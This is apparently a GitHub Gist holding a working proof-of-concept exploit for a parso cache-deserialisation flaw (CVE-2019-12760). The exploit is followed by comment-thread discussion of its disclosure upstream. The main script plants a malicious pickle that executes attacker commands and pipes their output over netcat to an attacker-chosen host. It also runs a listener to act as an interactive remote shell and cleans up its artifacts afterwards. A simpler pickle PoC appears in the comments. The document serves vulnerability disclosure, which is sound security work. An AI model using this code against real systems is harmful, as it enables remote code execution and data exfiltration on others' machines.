Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Proof-of-Concept for Python parso Cache Load Vulnerability
#!/usr/bin/python
import parso
import pickle
import random
import shutil
import threading
from hashlib import sha256
from os import makedirs, remove, system
from os.path import dirname, exists, join
from six import b, u
from subprocess import Popen, PIPE
from sys import version_info as v
from tinyscript import *
__author__ = "Alexandre D'Hondt"
__version__ = "1.0"
__copyright__ = "AGPLv3 (http://www.gnu.org/licenses/agpl.html)"
__doc__ = """
This Proof-of-Concept exploit leverages cache loading of the parso library.
It requires the attacker to be able to create a folder and to write files on
the target. It guesses the path to a cache file, writes an evil pickled object
to it and, while triggering grammar loading, makes the vulnerable application
load the evil pickle to allow Arbitrary Code Execution.
"""
# ------------------------- FUNCTIONS TO BE CUSTOMIZED -------------------------
def get_payload(command, lhost, lport):
# TODO: implement here the logic to send remote command result to attacker's
# host (i.e. if Netcat is not present on the remote server)
class PoC(object):
def __reduce__(self):
return (system, ("{} | nc -n {} {} -w 1"
.format(command, lhost, lport), ))
return pickle.dumps(PoC())
def remove_from_target(host, port, abspath):
# TODO: implement here the logic to remove a file from the remote server
remove(abspath)
def trigger_grammar_processing(dummy_path, cache_path):
# TODO: implement here the logic to trigger grammar processing by parso on
# the remote server
g = parso.load_grammar()
try:
g.parse(path=dummy_path, cache=True, cache_path=cache_path)
except:
pass
def write_to_target(host, port, abspath, content=""):
# TODO: implement here the logic to write a file to the remote server
d = dirname(abspath)
if not exists(d):
makedirs(d)
with open(abspath, 'wb') as f:
f.write(b(content))
logger.debug("> File written to '%s'" % abspath)
# ----------------------------- STATIC FUNCTIONS -------------------------------
class Listener(object):
def __init__(self):
self.state = 1
self.thread = threading.Thread(target=self.run)
self.kwargs = {'stdout': PIPE, 'stderr': PIPE, 'shell': True}
def run(self):
global args
last_lport = args.lport = 0
while True:
if self.state == 0:
break
while args.lport == last_lport:
args.lport = random.randint(12345, 45678)
logger.debug("Starting new listener on port {}".format(args.lport))
self.args = ("nc -nlvp {}".format(args.lport), )
out, _ = Popen(*self.args, **self.kwargs).communicate()
try:
print(out.decode('utf-8'))
except:
print(u(str(out)))
last_lport = args.lport
def cache_filepath(cache_path, python_implem, dummy_path, version):
# we take the hash from the grammar on the local host, thus assuming it is
# the same as target's one given Python's version
_ = dirname(parso.__file__)
_ = join(_, "python", "grammar%s.txt" % version)
h = sha256(open(_).read().encode("utf-8")).hexdigest()
p = sha256(dummy_path.encode("utf-8")).hexdigest()
_ = "%s/%s-%s-%i/%s-%s.pkl" % (cache_path, python_implem, version,
parso.cache._PICKLE_VERSION, h, p)
logger.debug("> Cache path: %s" % _)
return _
def start_shell():
global args
logger.debug("Starting shell...")
h, p, l = args.rhost, args.rport, args.lhost
i, v, r = args.implem, args.python, args.rdir
listener = Listener()
listener.thread.start()
cnt = 0
while True:
d = join(r, "dummy{}".format(cnt))
write_to_target(h, p, d)
cpath = cache_filepath(r, i, d, v)
try:
cmd = raw_input("> ")
except:
cmd = input("> ")
cmd = cmd.strip()
if cmd == "":
continue
elif cmd in ["exit", "quit"]:
listener.state = 0
logger.debug("Killing Netcat instances...")
Popen("killall -9 nc", shell=True)
logger.debug("Joining Netcat thread...")
listener.thread.join(1)
logger.debug("Removing artifacts...")
shutil.rmtree(args.rdir)
return
write_to_target(h, p, cpath, get_payload(cmd, l, args.lport))
trigger_grammar_processing(d, r)
remove_from_target(h, p, cpath)
remove_from_target(h, p, d)
cnt += 1
# -------------------------- SCRIPT'S EXECUTABLE PART --------------------------
if __name__ == '__main__':
global args
target = parser.add_argument_group("Target options")
target.add_argument("-d", "--cache-dir", dest="rdir", default="/tmp/parso",
help="cache absolute folder")
target.add_argument("-i", "--implem", default="CPython",
choices=["CPython", "IronPython", "Jython", "PyPy"],
help="platform Python's implementation")
target.add_argument("--rhost", default="127.0.0.1",
help="local host address")
target.add_argument("--rport", default=80, type=int,
help="local host port")
target.add_argument("-p", "--python", default="36",
help="Python major and minor version digits")
payload = parser.add_argument_group("Payload options")
payload.add_argument("--lhost", default="127.0.0.1",
help="local host address")
initialize(globals())
start_shell()
@iamleot

This comment has been minimized.

Copy link

commented Jun 7, 2019

Hello!
Have you shared that with upstream, if not can you please share it?

Thank you!

@dhondta

This comment has been minimized.

Copy link
Owner Author

commented Jun 7, 2019

Of course I did, nearly 6 months ago...

@iamleot

This comment has been minimized.

Copy link

commented Jun 7, 2019

@dhondta

This comment has been minimized.

Copy link
Owner Author

commented Jun 7, 2019

Yes, I did. The developer told me he would fix it within a few weeks.

NB: I think this would be very unlikely to be exploited in the wild, but yet it should be fixed.

@iamleot

This comment has been minimized.

Copy link

commented Jun 7, 2019

@dhondta

This comment has been minimized.

Copy link
Owner Author

commented Jun 7, 2019

Have you then recontacted him before CVE-2019-12760 was published?

Not yet, as I'm busy with other matters. I published this as a Gist for the records, also because it's kind of timed out regarding reponsible disclosure and for what it's worth.

In any case I think it would be better to fill a public issue upstream now that the problem is public. Can you please fill it?

You're right, I will open an issue on the related GitHub repo soon.

@iamleot

This comment has been minimized.

Copy link

commented Jun 15, 2019

JFTR this was reported upstream via davidhalter/parso#75.

Thank you!

@dhondta

This comment has been minimized.

Copy link
Owner Author

commented Jun 18, 2019

Simpler proof-of-concept script:

#!/usr/bin/python
import parso
import pickle
import sys
from hashlib import sha256
from os import makedirs, system
from os.path import dirname, exists, join
from six import b

__author__ = "Alexandre D'Hondt"

print("\n1. Writing a dummy empty file...")
dummy = "/tmp/dummy"
with open(dummy, 'wb') as f:
    f.write(b(""))
print("   > %s" % dummy)
print("\n2. Computing cache file's path...")
pyversion = "".join(sys.version.split(".")[:2])
grammar = join(dirname(parso.__file__), "python", "grammar%s.txt" % pyversion)
cache = "/tmp/parso/CPython-%s-%i/%s-%s.pkl" % (
    pyversion,
    parso.cache._PICKLE_VERSION,
    sha256(open(grammar).read().encode("utf-8")).hexdigest(),
    sha256(dummy.encode("utf-8")).hexdigest()
)
print("   > %s" % cache)
d = dirname(cache)
if not exists(d):
    makedirs(d)
print("\n3. Writing a evil cache file (with a pickle payload)...")
class PoC(object):
    def __reduce__(self):
        return (system, ("ls", ))
with open(cache, 'wb') as f:
    f.write(pickle.dumps(PoC()))
print("   > done")
print("\n4. Triggering grammar parsing...")
g = parso.load_grammar()
try:
    print("\nCommand's result:\n")
    g.parse(path=dummy, cache=True, cache_path="/tmp/parso")
except Exception as e:
    pass
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.